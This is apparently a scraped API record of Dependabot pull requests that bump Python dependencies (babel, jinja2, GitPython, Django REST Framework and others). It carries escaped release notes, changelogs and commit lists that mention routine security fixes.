href=\"https://github.com/encode/django-rest-framework/compare/3.15.1...3.15.2\"\u003ehttps://github.com/encode/django-rest-framework/compare/3.15.1...3.15.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 3.15.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the message to be consistent with the Django `HttpResponseBa… by \u003ca href=\"https://github.com/maycuatroi\"\u003e\u003ccode\u003e@​maycuatroi\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9287\"\u003eencode/django-rest-framework#9287\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003einflection\u003c/code\u003e package truly optional by \u003ca href=\"https://github.com/browniebroke\"\u003e\u003ccode\u003e@​browniebroke\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9303\"\u003eencode/django-rest-framework#9303\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix broken links in release notes for 3.15 by \u003ca href=\"https://github.com/browniebroke\"\u003e\u003ccode\u003e@​browniebroke\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9305\"\u003eencode/django-rest-framework#9305\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTokenAdmin.autocomplete_fields Breaks Some Use Cases, Revert by \u003ca href=\"https://github.com/alexdlaird\"\u003e\u003ccode\u003e@​alexdlaird\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9301\"\u003eencode/django-rest-framework#9301\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd drf-sendables to third-party-packages.md by \u003ca href=\"https://github.com/amikrop\"\u003e\u003ccode\u003e@​amikrop\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9261\"\u003eencode/django-rest-framework#9261\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;feat: Add some changes to ValidationError to support django style vad…\u0026quot; by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9326\"\u003eencode/django-rest-framework#9326\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;Re-prefetch related objects after updating\u0026quot; by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9327\"\u003eencode/django-rest-framework#9327\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/8863\"\u003e#8863\u003c/a\u003e by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9330\"\u003eencode/django-rest-framework#9330\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/8009\"\u003e#8009\u003c/a\u003e by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9332\"\u003eencode/django-rest-framework#9332\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/9030\"\u003e#9030\u003c/a\u003e by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9333\"\u003eencode/django-rest-framework#9333\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;Fix NamespaceVersioning ignoring DEFAULT_VERSION on non-None namespaces\u0026quot; by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9335\"\u003eencode/django-rest-framework#9335\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSearchFilter.get_search_terms\u003c/code\u003e returns list. by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9338\"\u003eencode/django-rest-framework#9338\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eVersion 3.15.1 by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9339\"\u003eencode/django-rest-framework#9339\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/maycuatroi\"\u003e\u003ccode\u003e@​maycuatroi\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9287\"\u003eencode/django-rest-framework#9287\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/alexdlaird\"\u003e\u003ccode\u003e@​alexdlaird\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9301\"\u003eencode/django-rest-framework#9301\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/c7a7eae551528b6887614df816c8a26df70272d6\"\u003e\u003ccode\u003ec7a7eae\u003c/code\u003e\u003c/a\u003e Version 3.15.2 (\u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/9439\"\u003e#9439\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/3b41f0124194430da957b119712978fa2266b642\"\u003e\u003ccode\u003e3b41f01\u003c/code\u003e\u003c/a\u003e Fix potential XSS vulnerability in break_long_headers template filter (\u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/9435\"\u003e#9435\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/fe92f0dd0d4c587eed000c7de611ddbff241bd6a\"\u003e\u003ccode\u003efe92f0d\u003c/code\u003e\u003c/a\u003e Add \u003ccode\u003e__hash__\u003c/code\u003e method for \u003ccode\u003epermissions.OperandHolder\u003c/code\u003e class (\u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/9417\"\u003e#9417\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/fbdab09c776d5ceef041793a7acd1c9e91695e5d\"\u003e\u003ccode\u003efbdab09\u003c/code\u003e\u003c/a\u003e docs: Correct some evaluation results and a httpie option in Tutorial1 (\u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/9421\"\u003e#9421\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/36d5c0e74f562cbe3055f0d20818bd48d3c32359\"\u003e\u003ccode\u003e36d5c0e\u003c/code\u003e\u003c/a\u003e tests: Check urlpatterns after cleanups (\u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/9400\"\u003e#9400\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/9d4ed054bf8acfac6209b7e7f837fc97517affcc\"\u003e\u003ccode\u003e9d4ed05\u003c/code\u003e\u003c/a\u003e Don't use Windows line endings\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/b34bde47d7fff403df4143a35c71975d7c2e7763\"\u003e\u003ccode\u003eb34bde4\u003c/code\u003e\u003c/a\u003e Fix typo in setup.cfg setting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/ab681f2d5e4a9645aa68eabf1ff18e41d0d5f642\"\u003e\u003ccode\u003eab681f2\u003c/code\u003e\u003c/a\u003e Update requirements in docs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/22377241a89c8233b45441b5adde5b858edef371\"\u003e\u003ccode\u003e2237724\u003c/code\u003e\u003c/a\u003e bump pygments (security hygiene)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/d58b8da591120abedc94c1b71576cb9afb2d7868\"\u003e\u003ccode\u003ed58b8da\u003c/code\u003e\u003c/a\u003e Update deprecation hints\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/encode/django-rest-framework/compare/3.2.3...3.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gitpython` from 0.1.7 to 3.1.41\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/gitpython-developers/GitPython/releases\"\u003egitpython's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.41 - fix Windows security issue\u003c/h2\u003e\n\u003cp\u003eThe details about the Windows security issue \u003ca href=\"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2mqj-m65w-jghx\"\u003ecan be found in this advisory\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eSpecial thanks go to \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e who reported the issue and fixed it in a single stroke, while being responsible for an incredible amount of improvements that he contributed over the last couple of months ❤️.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003e__all__\u003c/code\u003e in git.exc by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1719\"\u003egitpython-developers/GitPython#1719\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSet submodule update cadence to weekly by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1721\"\u003egitpython-developers/GitPython#1721\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNever modify sys.path by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1720\"\u003egitpython-developers/GitPython#1720\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump git/ext/gitdb from \u003ccode\u003e8ec2390\u003c/code\u003e to \u003ccode\u003eec58b7e\u003c/code\u003e by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1722\"\u003egitpython-developers/GitPython#1722\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevise comments, docstrings, some messages, and a bit of code by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1725\"\u003egitpython-developers/GitPython#1725\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse zero-argument super() by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1726\"\u003egitpython-developers/GitPython#1726\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove obsolete note in _iter_packed_refs by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1727\"\u003egitpython-developers/GitPython#1727\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReorganize test_util and make xfail marks precise by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1729\"\u003egitpython-developers/GitPython#1729\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eClarify license and make module top comments more consistent by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1730\"\u003egitpython-developers/GitPython#1730\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeprecate compat.is_\u003c!-- raw HTML omitted --\u003e, rewriting all uses by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1732\"\u003egitpython-developers/Git...\n\n_Description has been truncated_","html_url":"https://github.com/voolitels/fjord/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/voolitels%2Ffjord/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"},{"uuid":"2732830726","node_id":"PR_kwDOAsJDQs6i47AG","number":1,"state":"open","title":"Bump the pip group across 1 directory with 18 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-08-09T17:24:51.000Z","updated_at":"2025-08-09T17:24:51.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":18,"packages":[{"name":"babel","old_version":"2.1.1","new_version":"2.9.1","repository_url":"https://github.com/python-babel/babel"},{"name":"jinja2","old_version":"2.8.0","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"py","old_version":"1.4.30","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"virtualenv","old_version":"12.0.2","new_version":"20.26.6","repository_url":"https://github.com/pypa/virtualenv"},{"name":"celery","old_version":"3.1.19","new_version":"5.2.2","repository_url":"https://github.com/celery/celery"},{"name":"certifi","old_version":"2015.9.6.2","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"colander","old_version":"1.0","new_version":"1.7.0","repository_url":"https://github.com/Pylons/colander"},{"name":"cryptography","old_version":"1.1","new_version":"44.0.1","repository_url":"https://github.com/pyca/cryptography"},{"name":"gevent","old_version":"1.1b5","new_version":"23.9.0","repository_url":"https://github.com/gevent/gevent"},{"name":"gunicorn","old_version":"19.2.1","new_version":"23.0.0","repository_url":"https://github.com/benoitc/gunicorn"},{"name":"idna","old_version":"2.0","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"mako","old_version":"1.0.3","new_version":"1.2.2","repository_url":"https://github.com/sqlalchemy/mako"},{"name":"numpy","old_version":"1.10.1","new_version":"1.22.0","repository_url":"https://github.com/numpy/numpy"},{"name":"pymysql","old_version":"0.6.7","new_version":"1.1.1","repository_url":"https://github.com/PyMySQL/PyMySQL"},{"name":"pyopenssl","old_version":"0.15.1","new_version":"17.5.0","repository_url":"https://github.com/pyca/pyopenssl"},{"name":"requests","old_version":"2.8.1","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"webob","old_version":"1.5.1","new_version":"1.8.8","repository_url":"https://github.com/Pylons/webob"},{"name":"pip","old_version":"7.1.2","new_version":"23.3","repository_url":"https://github.com/pypa/pip"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 18 updates in the /requirements directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [babel](https://github.com/python-babel/babel) | `2.1.1` | `2.9.1` |\n| [jinja2](https://github.com/pallets/jinja) | `2.8.0` | `3.1.6` |\n| [py](https://github.com/pytest-dev/py) | `1.4.30` | `1.11.0` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `12.0.2` | `20.26.6` |\n| [celery](https://github.com/celery/celery) | `3.1.19` | `5.2.2` |\n| [certifi](https://github.com/certifi/python-certifi) | `2015.9.6.2` | `2024.7.4` |\n| [colander](https://github.com/Pylons/colander) | `1.0` | `1.7.0` |\n| [cryptography](https://github.com/pyca/cryptography) | `1.1` | `44.0.1` |\n| [gevent](https://github.com/gevent/gevent) | `1.1b5` | `23.9.0` |\n| [gunicorn](https://github.com/benoitc/gunicorn) | `19.2.1` | `23.0.0` |\n| [idna](https://github.com/kjd/idna) | `2.0` | `3.7` |\n| [mako](https://github.com/sqlalchemy/mako) | `1.0.3` | `1.2.2` |\n| [numpy](https://github.com/numpy/numpy) | `1.10.1` | `1.22.0` |\n| [pymysql](https://github.com/PyMySQL/PyMySQL) | `0.6.7` | `1.1.1` |\n| [pyopenssl](https://github.com/pyca/pyopenssl) | `0.15.1` | `17.5.0` |\n| [requests](https://github.com/psf/requests) | `2.8.1` | `2.32.4` |\n| [webob](https://github.com/Pylons/webob) | `1.5.1` | `1.8.8` |\n| [pip](https://github.com/pypa/pip) | `7.1.2` | `23.3` |\n\n\nUpdates `babel` from 2.1.1 to 2.9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/releases\"\u003ebabel's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThe internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003ch1\u003eUpcoming version support changes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Use CLDR 37 – Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/734\"\u003e#734\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNumbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/726\"\u003e#726\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eImport: Simplify iteration code in \u0026quot;import_cldr.py\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eImport: Stop using deprecated ElementTree methods \u0026quot;getchildren()\u0026quot; and \u0026quot;getiterator()\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eMessages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eMessages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eTests: fix tests when using Python 3.9 – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eTests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\u003c/li\u003e\n\u003cli\u003eTests: Support Py.test 6.x – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eUtilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/724\"\u003e#724\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUtilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocumentation\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate parse_number comments – Brad Martin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/708\"\u003e#708\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd \u003cstrong\u003eiter\u003c/strong\u003e to Catalog documentation – \u003ca href=\"https://github.com/CyanNani123\"\u003e\u003ccode\u003e@​CyanNani123\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.8.1\u003c/h2\u003e\n\u003cp\u003eThis patch version only differs from 2.8.0 in that it backports in \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/752\"\u003e#752\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003eVersion 2.8.0\u003c/h2\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Upgrade to CLDR 36.0 - Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/679\"\u003e#679\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMessages: Don't even open files with the \u0026quot;ignore\u0026quot; extraction method - \u003ca href=\"https://github.com/sebleblanc\"\u003e\u003ccode\u003e@​sebleblanc\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eNumbers: Fix formatting very small decimals when quantization is disabled - Lev Lybin, \u003ca href=\"https://github.com/miluChen\"\u003e\u003ccode\u003e@​miluChen\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/662\"\u003e#662\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMessages: Attempt to sort all messages – Mario Frasca (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/651\"\u003e#651\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/606\"\u003e#606\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocs\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/blob/master/CHANGES.rst\"\u003ebabel's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* The internal locale-data loading functions now validate the name of the locale file to be loaded and only\n  allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003cp\u003eUpcoming version support changes\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eImprovements\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* CLDR: Use CLDR 37 – Aarni Koskela (:gh:`734`)\n* Dates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (:gh:`741`)\n* Numbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (:gh:`726`)\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Dates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\n* Import: Simplify iteration code in \u0026amp;quot;import_cldr.py\u0026amp;quot; – Felix Schwarz\n* Import: Stop using deprecated ElementTree methods \u0026amp;quot;getchildren()\u0026amp;quot; and \u0026amp;quot;getiterator()\u0026amp;quot; – Felix Schwarz\n* Messages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\n* Messages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\n* Tests: fix tests when using Python 3.9 – Felix Schwarz\n* Tests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\n* Tests: Support Py.test 6.x – Aarni Koskela\n* Utilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (:gh:`724`)\n* Utilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\n\nDocumentation\n\u0026lt;/code\u0026gt;\u0026lt;/pre\u0026gt;\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;Update parse_number comments – Brad Martin (:gh:\u0026lt;code\u0026gt;708\u0026lt;/code\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Add \u0026lt;strong\u0026gt;iter\u0026lt;/strong\u0026gt; to Catalog documentation – \u0026lt;a href=\u0026quot;https://github.com/CyanNani123\u0026quot;\u0026gt;\u0026lt;code\u0026gt;@​CyanNani123\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;h2\u0026gt;Version 2.8.1\u0026lt;/h2\u0026gt;\n\u0026lt;p\u0026gt;This is solely a patch release to make running tests on Py.test 6+ possible.\u0026lt;/p\u0026gt;\n\u0026lt;p\u0026gt;Bugfixes\u0026lt;/p\u0026gt;\n\u0026lt;!-- raw HTML omitted --\u0026gt;\n\u0026lt;/blockquote\u0026gt;\n\u0026lt;p\u0026gt;... (truncated)\u0026lt;/p\u0026gt;\n\u0026lt;/details\u0026gt;\n\u0026lt;details\u0026gt;\n\u0026lt;summary\u0026gt;Commits\u0026lt;/summary\u0026gt;\n\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/a99fa2474c808b51ebdabea18db871e389751559\u0026quot;\u0026gt;\u0026lt;code\u0026gt;a99fa24\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Use 2.9.0's setup.py for 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/60b33e083801109277cb068105251e76d0b7c14e\u0026quot;\u0026gt;\u0026lt;code\u0026gt;60b33e0\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Become 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/412015ef642bfcc0d8ba8f4d05cdbb6aac98d9b3\u0026quot;\u0026gt;\u0026lt;code\u0026gt;412015e\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/782\u0026quot;\u0026gt;#782\u0026lt;/a\u0026gt; from python-babel/locale-basename\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5caf717ceca4bd235552362b4fbff88983c75d8c\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5caf717\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Disallow special filenames on Windows\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/3a700b5b8b53606fd98ef8294a56f9510f7290f8\u0026quot;\u0026gt;\u0026lt;code\u0026gt;3a700b5\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Run locale identifiers through \u0026lt;code\u0026gt;os.path.basename()\u0026lt;/code\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5afe2b2f11dcdd6090c00231d342c2e9cd1bdaab\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5afe2b2\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/754\u0026quot;\u0026gt;#754\u0026lt;/a\u0026gt; from 